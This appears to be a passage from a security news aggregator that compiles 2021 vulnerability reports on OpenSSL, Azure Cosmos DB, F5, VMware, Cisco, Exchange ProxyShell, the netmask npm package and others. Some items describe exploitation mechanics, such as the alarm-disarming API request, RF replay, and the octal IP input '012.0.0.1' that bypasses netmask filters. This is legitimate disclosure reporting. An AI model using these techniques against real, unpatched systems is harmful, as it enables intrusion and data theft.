"Successful exploits targeting IoT vulnerabilities have demonstrated they can provide an effective foothold onto enterprise networks," Brizinov said. "A flaw in a foundational protocol such as the SIP stack in VoIP phones and applications can be especially troublesome given the scale and reach shown by attacks against numerous other third-party components used by developers in software projects."
QNAP Working on Patches for OpenSSL Flaws Affecting its NAS Devices
3.9.21
Vulnerebility
Thehackernews
Network-attached
storage (NAS) appliance maker QNAP said it's currently investigating two
recently patched security flaws in OpenSSL to determine their potential impact,
adding it will release security updates should its products turn out to be
vulnerable.
Tracked as CVE-2021-3711 (CVSS score: 7.5) and CVE-2021-3712 (CVSS score: 4.4), the weaknesses concern a high-severity buffer overflow in SM2 decryption function and a buffer overrun issue when processing ASN.1 strings that could be abused by adversaries to run arbitrary code, cause a denial-of-service condition, or result in disclosure of private memory contents, such as private keys, or sensitive plaintext —
CVE-2021-3711 - OpenSSL SM2 decryption buffer overflow
CVE-2021-3712 - Read
buffer overruns processing ASN.1 strings
"A malicious attacker who is able
present SM2 content for decryption to an application could cause attacker chosen
data to overflow the buffer by up to a maximum of 62 bytes altering the contents
of other data held after the buffer, possibly changing application behaviour or
causing the application to crash," according to the advisory for CVE-2021-3711.
OpenSSL, a widely used open-source cryptographic library that provides encrypted connections using Secure Sockets Layer (SSL) or Transport Layer Security (TLS), addressed the issues in versions OpenSSL 1.1.1l and 1.0.2za that were shipped on August 24.
In the meanwhile, NetApp on Tuesday confirmed that the flaws affect a number of its products, while it continues to assess the rest of its lineup —
Clustered Data ONTAP
Clustered Data ONTAP Antivirus Connector
E-Series
SANtricity OS Controller Software 11.x
NetApp Manageability SDK
NetApp
SANtricity SMI-S Provider
NetApp SolidFire & HCI Management Node
NetApp
Storage Encryption
The development follows days after NAS maker Synology also
disclosed that it's opened an investigation into a number of models, comprising
DSM 7.0, DSM 6.2, DSM UC, SkyNAS, VS960HD, SRM 1.2, VPN Plus Server, and VPN
Server, to check if they are affected by the same two flaws.
"Multiple vulnerabilities allow remote attackers to conduct denial-of-service attack[s] or possibly execute arbitrary code via a susceptible version of Synology DiskStation Manager (DSM), Synology Router Manager (SRM), VPN Plus Server or VPN Server," the Taiwanese company said in an advisory.
Other companies whose products rely on OpenSSL have also released security bulletins, including —
Debian
Red Hat (CVE-2021-3711, CVE-2021-3712)
SUSE (CVE-2021-3711,
CVE-2021-3712), and
Ubuntu (CVE-2021-3711, CVE-2021-3712).
Attackers Can Remotely Disable Fortress Wi-Fi Home Security Alarms
3.9.21
Vulnerebility
Thehackernews
New vulnerabilities have been discovered in Fortress S03 Wi-Fi Home Security
System that could be potentially abused by a malicious party to gain
unauthorized access with an aim to alter system behavior, including disarming
the devices without the victim's knowledge.
The two unpatched issues, tracked under the identifiers CVE-2021-39276 (CVSS score: 5.3) and CVE-2021-39277 (CVSS score: 5.7), were discovered and reported by cybersecurity firm Rapid7 in May 2021 with a 60-day deadline to fix the weaknesses.
The Fortress S03 Wi-Fi Home Security System is a do-it-yourself (DIY) alarm system that enables users to secure their homes and small businesses from burglars, fires, gas leaks, and water leaks by leveraging Wi-Fi and RFID technology for keyless entry. The company's security and surveillance systems are used by "thousands of clients and continued customers," according to its website.
Calling the vulnerabilities "trivially easy to exploit," Rapid7 researchers
noted CVE-2021-39276 concerns an unauthenticated API Access that enables an
attacker in possession of a victim's email address to query the API to leak the
device's International Mobile Equipment Identity (IMEI) number, which also
doubles up as the serial number. Armed with the device's IMEI number and the
email address, the adversary can proceed to make a number of unauthorized
changes, such as disabling the alarm system via an unauthenticated POST request.
CVE-2021-39277, on the other hand, relates to an RF Signal replay attack, wherein a lack of adequate encryption grants the bad actor the ability to capture the radio frequency command and control communications over the air using a software-defined radio (SDR), and playback the transmission to perform specific functions, such as "arm" and "disarm" operations, on the target device.
"For CVE-2021-39276, an attacker with the knowledge of a Fortress S03 user's email address can easily disarm the installed home alarm without that user's knowledge," the researchers said in a report shared with The Hacker News.
"CVE-2021-39277 presents similar problems, but requires less prior knowledge of the victim, as the attacker can simply stake out the property and wait for the victim to use the RF-controlled devices within radio range. The attacker can then replay the 'disarm' command later, without the victim's knowledge."
Rapid7 said it notified Fortress Security of the bugs on May 13, 2021, only for the company to close the report 11 days later on May 24. We have reached out to Fortress Security for comment, and we will update the story if we hear back.
In light of the fact that the issues continue to persist, it's recommended that users configure their alarm systems with a unique, one-time email address to work around the IMEI number exposure.
"For CVE-2021-39277, there seems to be very little a user can do to mitigate the effects of the RF replay issues absent a firmware update to enforce cryptographic controls on RF signals. Users concerned about this exposure should avoid using the key fobs and other RF devices linked to their home security systems," the researchers said.
Kaseya Issues Patches for Two New 0-Day Flaws Affecting Unitrends Servers
28.8.21
Vulnerebility
Thehackernews
U.S. technology firm
Kaseya has released security patches to address two zero-day vulnerabilities
affecting its Unitrends enterprise backup and continuity solution that could
result in privilege escalation and authenticated remote code execution.
The two weaknesses are part of a trio of vulnerabilities discovered and reported by researchers at the Dutch Institute for Vulnerability Disclosure (DIVD) on July 3, 2021.
The IT infrastructure management solution provider has addressed the issues in server software version 10.5.5-2 released on August 12, DIVD said. An as-yet-undisclosed client-side vulnerability in Kaseya Unitrends remains unpatched, but the company has published firewall rules that can be applied to filter traffic to and from the client and mitigate any risk associated with the flaw. As an additional precaution, it's recommended not to leave the servers accessible over the internet.
Although specifics related to the vulnerabilities are sparse, the shortcomings concern an authenticated remote code execution vulnerability as well as a privilege escalation flaw from read-only user to admin on Unitrends servers, both of which hinge on the possibility that an attacker has already gained an initial foothold on a target's network, making them more difficult to exploit.
The disclosure comes close to two months after the company suffered a crippling ransomware strike on its VSA on-premises product, leading to the mysterious shutdown of REvil cybercrime syndicate in the following weeks. Kaseya has since shipped fixes for the zero-days that were exploited to gain access to the on-premise servers, and late last month, said it obtained a universal decryptor "to remediate customers impacted by the incident."
Critical Cosmos Database Flaw Affected Thousands of Microsoft Azure Customers
27.8.21
Vulnerebility
Thehackernews
Cloud infrastructure security company Wiz on Thursday revealed details of a now-fixed Azure Cosmos database vulnerability that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization.
The flaw, which grants read, write, and delete privileges, has been dubbed "ChaosDB," with Wiz researchers noting that "the vulnerability has a trivial exploit that doesn't require any previous access to the target environment, and impacts thousands of organizations, including numerous Fortune 500 companies."
Cosmos DB is Microsoft's proprietary NoSQL database that's advertised as "a fully managed service" that "takes database administration off your hands with automatic management, updates and patching."
The Wiz Research Team reported the issue to Microsoft on August 12, after which
the Windows maker took steps to mitigate the issue within 48 hours of
responsible disclosure, in addition to awarding a $40,000 bounty to the finders
on August 17.
"We have no indication that external entities outside the researcher had access to the primary read-write key associated with your Azure Cosmos DB account(s)," Microsoft said in a statement. "In addition, we are not aware of any data access because of this vulnerability. Azure Cosmos DB accounts with a vNET or firewall enabled are protected by additional security mechanisms that prevent risk of unauthorized access."
The exploit identified by Wiz concerns a chain of vulnerabilities in the Jupyter Notebook feature of Cosmos DB, enabling an adversary to obtain the credentials corresponding to the target Cosmos DB account, including the Primary Key, which provides access to the administrative resources for the database account.
"Using these credentials, it is possible to view, modify, and delete data in the target Cosmos DB account via multiple channels," the researchers said. As a consequence, any Cosmos DB asset that has the Jupyter Notebook feature enabled is potentially impacted.
Although Microsoft notified over 30% of Cosmos DB customers about the potential security breach, Wiz expects the actual number to be much higher, given that the vulnerability has been exploitable for months.
"Every Cosmos DB customer should assume they've been exposed," Wiz researchers noted, adding, "we also recommend reviewing all past activity in your Cosmos DB account." Additionally, Microsoft is also urging its customers to regenerate their Cosmos DB Primary Keys to mitigate any risk arising from the flaw.
F5 Releases Critical Security Patch for BIG-IP and BIG-IQ Devices
27.8.21
Vulnerebility
Thehackernews
Enterprise security and network appliance vendor F5 has released patches for more than two dozen security vulnerabilities affecting multiple versions of BIG-IP and BIG-IQ devices that could potentially allow an attacker to perform a wide range of malicious actions, including accessing arbitrary files, escalating privileges, and executing JavaScript code.
Of the 29 bugs addressed, 13 are high-severity flaws, 15 are rated medium, and one is rated low in severity.
Chief among them is CVE-2021-23031 (CVSS score: 8.8), a vulnerability affecting BIG-IP Advanced Web Application Firewall and BIG-IP Application Security Manager that allows an authenticated user to perform a privilege escalation.
"When this vulnerability is exploited, an authenticated attacker with access to the Configuration utility can execute arbitrary system commands, create or delete files, and/or disable services. This vulnerability may result in complete system compromise," F5 said in its advisory.
It's worth noting that for customers running the device in Appliance Mode, which applies additional technical restrictions in sensitive sectors, the same vulnerability comes with a critical rating of 9.9 out of 10. "As this attack is conducted by legitimate, authenticated users, there is no viable mitigation that also allows users access to the Configuration utility. The only mitigation is to remove access for users who are not completely trusted," the company said.
The other major vulnerabilities resolved by F5 are listed below -
CVE-2021-23025 (CVSS score: 7.2) - Authenticated remote command execution
vulnerability in BIG-IP Configuration utility
CVE-2021-23026 (CVSS score:
7.5) - Cross-site request forgery (CSRF) vulnerability in iControl SOAP
CVE-2021-23027 and CVE-2021-23037 (CVSS score: 7.5) - TMUI DOM-based and
reflected cross-site scripting (XSS) vulnerabilities
CVE-2021-23028 (CVSS
score: 7.5) - BIG-IP Advanced WAF and ASM vulnerability
CVE-2021-23029 (CVSS
score: 7.5) - BIG-IP Advanced WAF and ASM TMUI vulnerability
CVE-2021-23030
and CVE-2021-23033 (CVSS score: 7.5) - BIG-IP Advanced WAF and ASM Websocket
vulnerabilities
CVE-2021-23032 (CVSS score: 7.5) - BIG-IP DNS vulnerability
CVE-2021-23034, CVE-2021-23035, and CVE-2021-23036 (CVSS score: 7.5) - Traffic
Management Microkernel vulnerabilities
Additionally, F5 has also patched a
number of flaws that range from directory traversal vulnerability and SQL
injection to open redirect vulnerability and cross-site request forgery, as well
as a MySQL database flaw that results in the database consuming more storage
space than expected when brute-force protection features of the firewall are
enabled.
With F5 devices often becoming juicy targets for active exploitation attempts by threat actors, it's highly recommended that users and administrators install updated software or apply the necessary mitigations as soon as possible.
VMware Issues Patches to Fix New Flaws Affecting Multiple Products
27.8.21
Vulnerebility
Thehackernews
VMware on Wednesday
shipped security updates to address vulnerabilities in multiple products that
could be potentially exploited by an attacker to take control of an affected
system.
The six security weaknesses (from CVE-2021-22022 through CVE-2021-22027, CVSS scores: 4.4 - 8.6) affect VMware vRealize Operations (prior to version 8.5.0), VMware Cloud Foundation (versions 3.x and 4.x), and vRealize Suite Lifecycle Manager (version 8.x), as listed below -
CVE-2021-22022 (CVSS score: 4.4) - Arbitrary file read vulnerability in vRealize
Operations Manager API, leading to information disclosure
CVE-2021-22023
(CVSS score: 6.6) - Insecure direct object reference vulnerability in vRealize
Operations Manager API, enabling an attacker with administrative access to alter
other users' information and seize control of an account
CVE-2021-22024 (CVSS
score: 7.5) - Arbitrary log-file read vulnerability in vRealize Operations
Manager API, resulting in sensitive information disclosure
CVE-2021-22025
(CVSS score: 8.6) - Broken access control vulnerability in vRealize Operations
Manager API, allowing an unauthenticated malicious actor to add new nodes to the
existing vROps cluster
CVE-2021-22026 and CVE-2021-22027 (CVSS score: 7.5) -
Server Side Request Forgery vulnerability in vRealize Operations Manager API,
leading to information disclosure
Credited with reporting the flaws are Egor
Dimitrenko of Positive Technologies (CVE-2021-22022 and CVE-2021-22023) and
thiscodecc of MoyunSec V-Lab (from CVE-2021-22024 to CVE-2021-22027).
Separately, VMware has also issued patches to remediate a cross-site scripting (XSS) vulnerability impacting VMware vRealize Log Insight and VMware Cloud Foundation that stems from a case of improper user input validation, enabling an adversary with user privileges to inject malicious payloads via the Log Insight UI that's executed when a victim accesses the shared dashboard link.
The flaw, which has been assigned the identifier CVE-2021-22021, has been rated 6.5 for severity on the CVSS scoring system. Marcin Kot of Prevenity and Tran Viet Quang of Vantage Point Security have been credited for independently discovering and reporting the vulnerability.
The patches also arrive a week after VMware patched a denial-of-service bug in its VMware Workspace ONE UEM console (CVE-2021-22029, CVSS score: 5.3) that an actor with access to "/API/system/admins/session" could abuse to render the API unavailable due to improper rate limiting.
Critical Flaw Discovered in Cisco APIC for Switches — Patch Released
27.8.21
Vulnerebility
Thehackernews
Cisco Systems on
Wednesday issued patches to address a critical security vulnerability affecting
the Application Policy Infrastructure Controller (APIC) interface used in its
Nexus 9000 Series Switches that could be potentially abused to read or write
arbitrary files on a vulnerable system.
Tracked as CVE-2021-1577 (CVSS score: 9.1), the issue — which is due to improper access control — could enable an unauthenticated, remote attacker to upload a file to the appliances. " A successful exploit could allow the attacker to read or write arbitrary files on an affected device," the company said in an advisory.
The APIC appliance is a centralized, clustered controller that programmatically automates network provisioning and control based on the application requirements and policies across physical and virtual environments.
Cisco said it discovered the vulnerability during internal security testing by the Cisco Advanced Security Initiatives Group (ASIG).
Additionally, the network equipment major said it concluded its investigation
into a new BadAlloc flaw in BlackBerry's QNX real-time operating system,
reported on August 17 by the Canadian company. "Cisco has completed its
investigation into its product line to determine which products may be affected
by this vulnerability. No products are known to be affected," it noted.
Cisco products that run QNX are listed below -
Channelized shared port adapters (SPAs) (CSCvz34866)
Circuit Emulation over
Packet (CEoP) SPAs (CSCvz34865)
IOS XR 32-bit Software (CSCvz34871)
RF
Gateway 10 (CSCvz34869)
Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux
Systems
23.8.21
Vulnerebility
Thehackernews
Close to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.
That's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm Trend Micro, detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.
The company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.
In addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) —
CVE-2017-5638 (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE)
vulnerability
CVE-2017-9805 (CVSS score: 8.1) - Apache Struts 2 REST plugin
XStream RCE vulnerability
CVE-2018-7600 (CVSS score: 9.8) - Drupal Core RCE
vulnerability
CVE-2020-14750 (CVSS score: 9.8) - Oracle WebLogic Server RCE
vulnerability
CVE-2020-25213 (CVSS score: 10.0) - WordPress File Manager
(wp-file-manager) plugin RCE vulnerability
CVE-2020-17496 (CVSS score: 9.8) -
vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability
CVE-2020-11651
(CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability
CVE-2017-12611 (CVSS score: 9.8) - Apache Struts OGNL expression RCE
vulnerability
CVE-2017-7657 (CVSS score: 9.8) - Eclipse Jetty chunk length
parsing integer overflow vulnerability
CVE-2021-29441 (CVSS score: 9.8) -
Alibaba Nacos AuthFilter authentication bypass vulnerability
CVE-2020-14179
(CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability
CVE-2013-4547 (CVSS score: 8.0) - Nginx crafted URI string handling access
restriction bypass vulnerability
CVE-2019-0230 (CVSS score: 9.8) - Apache
Struts 2 RCE vulnerability
CVE-2018-11776 (CVSS score: 8.1) - Apache Struts
OGNL expression RCE vulnerability
CVE-2020-7961 (CVSS score: 9.8) - Liferay
Portal untrusted deserialization vulnerability
Even more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to secure containers from a wide range of potential threats at each stage of the development pipeline.
"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model," the researchers concluded.
WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws
20.8.21
Vulnerebility
Thehackernews
The U.S.
Cybersecurity and Infrastructure Security Agency is warning of active
exploitation attempts that leverage the latest line of "ProxyShell" Microsoft
Exchange vulnerabilities that were patched earlier this May, including deploying
LockFile ransomware on compromised systems.
Tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.
"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine," CISA said.
The development comes a little over a week after cybersecurity researchers sounded the alarm on opportunistic scanning and exploitation of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.
Image Source: Huntress Labs
Originally demonstrated at the Pwn2Own hacking
contest in April this year, ProxyShell is part of a broader trio of exploit
chains discovered by DEVCORE security researcher Orange Tsai that includes
ProxyLogon and ProxyOracle, the latter of which concerns two remote code
execution flaws that could be employed to recover a user's password in plaintext
format.
"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out," researcher Kevin Beaumont noted last week.
Now according to researchers from Huntress Labs, at least five distinct styles of web shells have been observed as deployed to vulnerable Microsoft Exchange servers, with over over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.
More than 140 web shells have been detected across no fewer than 1,900 unpatched Exchanger servers to date, Huntress Labs CEO Kyle Hanslovan tweeted, adding "impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more."
Vulnerability in 'netmask' npm Package Affects 280,000 Projects
30.3.2021
Vulnerebility
Securityweek
A vulnerability in the netmask npm package could expose private networks and lead to a variety of attacks, including malware delivery.
The newly identified issue (which is tracked as CVE-2021-28918) resides in the fact that the package would incorrectly read octal encoding, essentially resulting in the misinterpretation of supplied IP addresses.
Designed to parse IPv4 CIDR blocks to allow for their comparison and exploration, netmask is highly popular, registering millions of weekly downloads. At the moment, it is used by more than 278,000 other projects.
Because of this bug, netmask would consider private IP addresses as external IP addresses and the other way around, thus opening the door to a wide range of attacks, depending on the manner in which the package is used.
Some of the possible attacks include server-side request forgery, remote file inclusion, and local file inclusion, among others, a security researcher going by the name of Sick Codes explains.
Working together with application developer and researcher Victor Viale, Sick Codes discovered that netmask is incorrectly evaluating the first octet in an IP address that starts with 0, which is in octal format, and reads it as a true decimal value.
A remote, unauthenticated attacker could leverage the vulnerability to trick an application using the flawed package into fetching malicious code from an external IP address as if it was supplied from within the local network.
“A remote authenticated or unauthenticated attacker can bypass packages that rely on netmask to filter IP address blocks to reach intranets, VPNs, containers, adjacent VPC instances, or LAN hosts using input data such as 012.0.0.1 (10.0.0.1), which netmask evaluates as 12.0.0.1 (public),” Sick Codes explains.
Even if the browser would recognize octal strings, if a nodejs application does not, attacks are possible, allowing users to users can submit malicious URLs that seem internal, yet which in reality lead to remote files.
“You don’t need a special IP address to do this though, you can simply submit a public URL and get local files back. There’s literally so many vulnerabilities caused by this that it will make your head spin,” the researcher adds.
The netmask package, which is maintained by Marcus Dunn, director of engineering at Netflix, was patched within days after the vulnerability was responsibly reported.
The fix covered the manner in which netmask interprets base-8 integers, base-16 integers, and hexadecimal input, as well as the situations where white-spaces are used. All other packages and APIs that leverage netmask need to be updated to address the potential exposure to attacks.
Solarwinds Orion Platform updates fix two remote code execution issues
27.3.2021
Vulnerebility
Securityaffairs
Solarwinds released security updates that address multiple vulnerabilities,
including two flaws that be exploited by attackers for remote code execution.
Solarwinds has released a major security update to address multiple security
vulnerabilities affecting the Orion Platform, the one that was involved in the
Solarwinds supply chain attack.
The software vendors released the Orion Platform version 2020.2.5 to fix the issues, the most severe one is a critical remote code execution vulnerability. The flaw is an RCE via Actions and JSON Deserialization that could be exploited by an authenticated attacker, it was reported via the ZDI Trend Micro initiative.
“A remote code execution vulnerability has been found via the test alert actions. An Orion authenticated user is required to exploit this.” reads the advisory.
The vendor did not disclose technical details of the vulnerability to avoid its
exploitation in the wild.
The company also addressed another RCE rated as
high-risk severity that could be exploited by an attacker with the knowledge of
the credentials of an unprivileged local account on the Orion Server.
“The vulnerability can be used to achieve authenticated RCE as Administrator. In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server.” states the advisory.
The flaw was reported by by the security researcher Harrison Neal from ZDI Trend Micro.
The latest version also addressed a Reverse Tabnabbing and Open Redirect issue and a Stored XSS in Customize view, respectively tracked as CVE-2021-3109 and CVE-2020-35856 and rated as medium and high severity.
“A stored XSS vulnerability was found in the add custom tab within customize view page by a security researcher. This vulnerability requires Orion administrator account to exploit this.” states the advisory.
Severe Flaws in Official 'Facebook for WordPress' Plugin
27.3.2021
Vulnerebility
Securityweek
A critical vulnerability in the official Facebook for WordPress plugin could be abused to upload arbitrary files, essentially leading to remote code execution, according to a warning from security researchers at Wordfence.
Formerly known as Official Facebook Pixel, the Facebook for WordPress plugin is used on more than 500,000 sites, allowing administrators to capture actions that visitors take when interacting with the page.
The bug carries a CVSS score of 9.0 and was reported to Facebook on December 22. Wordfence said the critical severity bug could allow an unauthenticated attacker to access a site’s secret and exploit a deserialization weakness to achieve remote code execution.
Described as a “PHP object injection with POP chain,” the vulnerability existed because the nonce that a function in Facebook for WordPress required could be generated using a custom script, and because a variable in a function meant to deserialize user data could be supplied by the user themselves.
“When user-supplied input is deserialized in PHP, users can supply PHP objects that can trigger magic methods and execute actions that can be used for malicious purposes,” the company said in an advisory.
They also note that, while a deserialization vulnerability could be relatively harmless on its own, the addition of a gadget, or magic method, to the mix would result in “significant damage” to a site. The bug in Facebook for WordPress could be combined with a magic method to upload arbitrary files, leading to remote code execution.
By abusing the vulnerability, an attacker could generate a PHP file in the home directory of a vulnerable website, then change the contents of that PHP file to whatever they wanted, achieving code execution.
After Facebook patched the flaw, the security researchers discovered a Cross-Site Request Forgery to Stored Cross-Site Scripting vulnerability in the updated plugin, and reported it on January 27. Patched in February, the issue was rooted in rewritten code that modified some of the plugin’s initial functionality related to saving the plugin’s settings.
“This function is used to update the plugin’s settings with the Facebook Pixel ID, access token, and external business key. These settings help establish a connection with the Facebook pixel console so that event data can be sent from the WordPress site to the appropriate Facebook pixel account,” Wordfence explains.
The function lacked a nonce protection, meaning that it could not verify whether requests came from a legitimate authenticated administrator, thus allowing an attacker to “craft a request that would be executed if they could trick an administrator into performing an action while authenticated to the target site.”
An attacker could abuse the action to update the plugin’s settings and steal metric data for a site, and even inject malicious JavaScript code into the setting values. The code would be executed in the admin’s browser when they access the settings page, and could allow for the injection of backdoors into theme files, or for the creation of new administrative accounts, leading to complete site takeover.
Critical Flaw in Jabber for Windows Could Lead to Code Execution
27.3.2021
Vulnerebility
Securityweek
Cisco this week announced the release of software updates that address several vulnerabilities in Jabber for desktop and mobile platforms, the most severe of which could be abused to execute arbitrary code with elevated privileges.
The bugs impact Cisco Jabber for Windows, macOS, and mobile platforms, and are not dependable to one another. To successfully exploit them, an attacker would need to be authenticated to an Extensible Messaging and Presence Protocol (XMPP) server in use by the affected software and to be able to send XMPP messages.
The most important of them is CVE-2021-1411, a critical arbitrary program execution flaw in Jabber for Windows, which exists because of improper validation of message content. Successful exploitation of this vulnerability could result in code execution, Cisco explains.
Next in line is CVE-2021-1469, a high-severity security hole in Jabber for Windows that, similarly to CVE-2021-1411, could lead to code execution. The third issue is CVE-2021-1417, a medium-severity vulnerability leading to information disclosure.
Two other medium-severity flaws affect Jabber for Windows, Jabber for macOS, and Jabber for mobile platforms. The first of them (CVE-2021-1471) could allow an attacker to inspect or tamper with connections between the Jabber client and a server, while the second (CVE-2021-1418) could be exploited for denial of service.
Cisco has released software updates to address these vulnerabilities and notes that there are no workarounds for them. The company also notes that it is not aware of these bugs being exploited in attacks.
This week, the tech giant also released advisories for more than 40 high- and medium-severity vulnerabilities across its product portfolio.
These include patches for a series of vulnerabilities in IOS XE SD-WAN software (DoS, arbitrary command execution, and buffer overflow), flaws in various IOS XE components (leading to OS command injection, DoS, privilege escalation, and arbitrary code execution), and bugs in Access Points Software (code execution, DoS, and information disclosure).
Cisco also announced that it is investigating the impact of the two high-severity vulnerabilities that the OpenSSL Project patched on Thursday, and which could result in attackers signing certificates, or causing a DoS condition.
This week, Cisco also patched medium-severity vulnerabilities in IOS XE SD-WAN software, IOS application environment, Network Convergence System (NCS) 520 routers, Aironet access points, and IOS XE wireless controller software. The flaws could be exploited for command injection, denial of service, privilege escalation, file overwrite, and other types of attacks.
Information on all of these vulnerabilities is available on Cisco’s security portal.
New 5G Flaw Exposes Priority Networks to Location Tracking and Other Attacks
27.3.2021
Attack Mobil
Vulnerebility
Thehackernews
New research into 5G architecture has uncovered a security flaw in its network slicing and virtualized network functions that could be exploited to allow data access and denial of service attacks between different network slices on a mobile operator's 5G network.
AdaptiveMobile shared its findings with the GSM Association (GSMA) on February 4, 2021, following which the weaknesses were collectively designated as CVD-2021-0047.
5G is an evolution of current 4G broadband cellular network technology, and is based on what's called a service-based architecture (SBA) that provides a modular framework to deploy a set of interconnected network functions, allowing consumers to discover and authorize their access to a plethora of services.
The network functions are also responsible for registering subscribers, managing
sessions and subscriber profiles, storing subscriber data, and connecting the
users (UE or user equipment) to the internet via a base station (gNB). What's
more, each network function of the SBA can offer a specific service but at the
same time can also request a service from another network function.
One of the ways the core SBA of the 5G network is orchestrated is through a slicing model. As the name indicates, the idea is to "slice" the original network architecture in multiple logical and independent virtual networks that are configured to meet a specific business purpose, which, in turn, dictates the quality of service (QoS) requirements necessary for that slice.
5G QoS Network Slicing Vulnerability
Additionally, each slice in the core
network consists of a logical group of network functions (NFs) that can be
exclusively assigned to that slice or be shared among different slices.
Put differently, by creating separate slices that prioritize certain characteristics (e.g., large bandwidths), it enables a network operator to carve out solutions that are customized to particular industries.
For instance, a mobile broadband slice can be used to facilitate entertainment and Internet-related services, an Internet of Things (IoT) slice can be used to offer services tailored to retail and manufacturing sectors, while a standalone low latency slice can be designated for mission-critical needs such as healthcare and infrastructure.
"The 5G SBA offers many security features which includes lessons learned from previous generations of network technologies," AdaptiveMobile said in a security analysis of 5G core network slicing. "But on the other hand, 5G SBA is a completely new network concept that opens the network up to new partners and services. These all lead to new security challenges."
According to the mobile network security firm, this architecture not only poses
fresh security concerns that stem from a need to support legacy functions but
also from a "massive increase in protocol complexity" as a consequence of
migrating from 4G to 5G, and in the process opening the door to a multitude of
attacks, including —
Malicious access to a slice by brute-forcing its slice differentiator, an
optional value set by the network operator for distinguishing between slices of
the same type, thereby allowing a rogue slice to gain unauthorized information
from a second slice like Access and Mobility Management Function (AMF), which
maintains knowledge of a user equipment's location.
Denial-of-service (DoS)
against another network function by taking advantage of a compromised slice.
The attacks hinge on a design quirk that there are no checks to ensure that the
slice identity in the signaling layer request matches that used in the transport
layer, thus permitting an adversary connected to the 5G operator's SBA through a
rogue network function to get hold of the core network as well as the network
slices.
It's worth noting that the signaling layer is the telecommunication-specific application layer used for exchanging signaling messages between network functions that are located in different slices.
As countermeasures, AdaptiveMobile recommends partitioning the network into
different security zones by applying signaling security filters between
different slices, the core network, and external partners, and the shared and
not-shared network functions, in addition to deploying a signaling layer
protection solution to safeguard against data leakage attacks that leverage the
missing correlation between layers.
While the current 5G architecture doesn't support such a protection node, the study suggests enhancing the Service Communication Proxy (SCP) to validate the correctness of message formats, match the information between layers and protocols, and provide load-related functionality to prevent DoS attacks.
"This kind of filtering and validation approach allows division of the network into security zones and safeguarding of the 5G core network," the researchers said. "Cross-correlation of attack information between those security network functions maximizes the protection against sophisticated attackers and allows better mitigations and faster detection while minimizing false alarms."
OpenSSL Project released 1.1.1k version to fix two High-severity flaws
26.3.2021 Crypto Vulnerebility Securityweek
The OpenSSL Project addresses two high-severity vulnerabilities, including one
related to verifying a certificate chain and one that can trigger a DoS
condition.
The OpenSSL Project this week released version 1.1.1k to address
two high-severity vulnerabilities, respectively tracked as CVE-2021-3450 and
CVE-2021-3449.
The CVE-2021-3449 vulnerability could be exploited to trigger a DoS condition by sending a specially crafted renegotiation ClientHello message from a client.
“An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack,” State the advisory.
The issue affects servers running OpenSSL 1.1.1 versions with TLS 1.2 and renegotiation enabled, which is the default configuration. The vulnerability was reported by Peter Kästle and Samuel Sapalski from Nokia.
The CVE-2021-3450 vulnerability is related to the verification of a certificate chain when using the X509_V_FLAG_X509_STRICT flag.
“The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check.” reads the advisory published by the OpenSSL Project. “An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates,”
The vulnerability was reported by Benjamin Kaduk and Xiang Ding from Akamai.
In February 2021, the OpenSSL Project released security patches to address three vulnerabilities, two denial-of-service (DoS) flaws, and an incorrect SSLv2 rollback protection issue.
62,000 Microsoft Exchange Servers potentially left unpatched, weeks after
software bugs were first uncovered
26.3.2021
Vulnerebility
Securityaffairs
The CyberNews investigation team found 62,174 potentially vulnerable unpatched
Microsoft Exchange Servers.
A number of entities in the US and worldwide
remain vulnerable to software bugs that were reported by Microsoft weeks ago.
The CyberNews investigation team found 62,174 potentially vulnerable unpatched Microsoft Exchange Servers. The vulnerability is still being actively exploited, most famously by the China-linked malicious actors.
On March 2, Microsoft detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server. Microsoft attributed the campaign to the China-linked threat actor group Hafnium. However, vulnerabilities are being exploited by threat actors beyond Hafnium.
